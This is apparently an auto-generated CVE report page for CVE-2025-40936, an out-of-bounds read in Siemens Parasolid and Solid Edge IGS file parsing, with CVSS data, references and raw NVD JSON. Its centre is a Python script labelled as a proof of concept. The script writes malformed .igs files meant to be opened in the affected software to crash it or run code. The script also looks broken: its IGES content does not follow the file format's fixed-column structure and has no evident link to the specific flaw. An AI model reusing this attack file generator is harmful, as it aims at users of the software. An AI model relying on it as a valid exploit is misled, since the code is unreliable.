Security Vulnerability Report
CVE-2025-40936 CVSS 7.8 HIGH

CVE-2025-40936

Published: 2025-11-17 12:15:44
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions < V29.0.258), Solid Edge (All versions < V226.00 Update 03). The affected applications contain an out-of-bounds read vulnerability while parsing specially crafted IGS files. This could allow an attacker to crash the application or execute code in the context of the current process. (ZDI-CAN-26755)

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PS/IGES Parasolid Translator Component < V29.0.258
Solid Edge < V226.00 Update 03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-40936 PoC - Malicious IGS File Generator
Siemens Parasolid/Solid Edge IGS Parsing Out-of-Bounds Read

This PoC generates a malformed IGS file that triggers an out-of-bounds read
vulnerability in affected versions of Siemens Parasolid Translator Component
and Solid Edge.

DISCLAIMER: This code is for educational and security research purposes only.
Unauthorized use against systems you do not own or have permission to test
is illegal. Use responsibly.
"""

import struct
import os


def generate_malformed_igs():
    """
    Generate a malformed IGS file to trigger out-of-bounds read.

    The vulnerability exists in IGS file parsing where boundary checks
    are insufficient when processing entity data.
    """
    # IGS Header Section
    header = """SGRDMFRSASCIIFILEFORIGESFORMAT 1.,1.,2H,1H,,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H
"""

    # Directory Entry Section - Malformed entity data
    # Craft entries with oversized parameter data to trigger OOB read
    directory_entries = """
128 1 1 0 0 0 0 000000000D 1
128 0 1 0 0 0 0 000000000D 1
"""

    # Parameter Section - Malformed data
    # The vulnerability is triggered when parsing these parameters
    # Using extreme values and malformed coordinate data
    params = """
128,1,9999999999.0,9999999999.0,9999999999.0,0.0,0.0,0.0,9999999999.0,9999999999.0,9999999999.0
128,2,9999999999.0,9999999999.0,9999999999.0,0.0,0.0,0.0,9999999999.0,9999999999.0,9999999999.0
"""

    # Malformed coordinate data designed to trigger boundary issues
    # in the IGS parser
    malformed_data = """
9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999
9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999,9999999999.0E+9999
"""

    # IGS Terminator Section
    terminator = """S 1T 1
"""

    # Combine all sections
    igs_content = header + directory_entries + params + malformed_data + terminator
    return igs_content


def generate_igs_with_buffer_overflow():
    """
    Alternative PoC: Generate IGS with buffer overflow conditions
    targeting the entity parsing logic.
    """
    # Create a minimal IGS file with malformed entity structure
    igs_content = """MALFORGEDIGESFILEFORCVE202540936 1.,1.,2H,1H,,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H,1H
"""

    # Add many malformed entity directory entries
    for i in range(1000):
        igs_content += f"{128+i:7d} 1 1 0 0 0 0 000000000D 1\n"
        igs_content += f"{128+i:7d} 0 1 0 0 0 0 000000000D 1\n"

    # Malformed parameters with oversized values
    for i in range(1000):
        igs_content += f"128,{i}," + ",".join(["9999999999.0"] * 50) + "\n"

    igs_content += "S 1T 1\n"
    return igs_content


def main():
    """Generate and save PoC IGS files"""
    print("[*] Generating CVE-2025-40936 PoC IGS files...")
    print("[*] Target: Siemens Parasolid Translator Component < V29.0.258")
    print("[*] Target: Siemens Solid Edge < V226.00 Update 03")
    print()

    # Generate basic PoC
    poc_igs = generate_malformed_igs()
    with open("CVE-2025-40936_poc.igs", "w") as f:
        f.write(poc_igs)
    print("[+] Generated: CVE-2025-40936_poc.igs")

    # Generate aggressive PoC
    poc_igs_aggressive = generate_igs_with_buffer_overflow()
    with open("CVE-2025-40936_poc_aggressive.igs", "w") as f:
        f.write(poc_igs_aggressive)
    print("[+] Generated: CVE-2025-40936_poc_aggressive.igs")
    print()
    print("[*] Usage: Open the generated .igs file with affected Siemens software")
    print("[*] Expected result: Application crash or potential code execution")


if __name__ == "__main__":
    main()

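References

https://cert-portal.siemens.com/productcert/html/ssa-241605.html
https://cert-portal.siemens.com/productcert/html/ssa-445819.html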

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40936", "sourceIdentifier": "[email protected]", "published": "2025-11-17T12:15:44.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions < V29.0.258), Solid Edge (All versions < V226.00 Update 03). The affected applications contains an out of bounds read vulnerability while parsing specially crafted IGS files. This could allow an attacker to crash the application or execute code in the context of the current process. (ZDI-CAN-26755)"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-241605.html", "source": "[email protected]"}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-445819.html", "source": "[email protected]"}]}}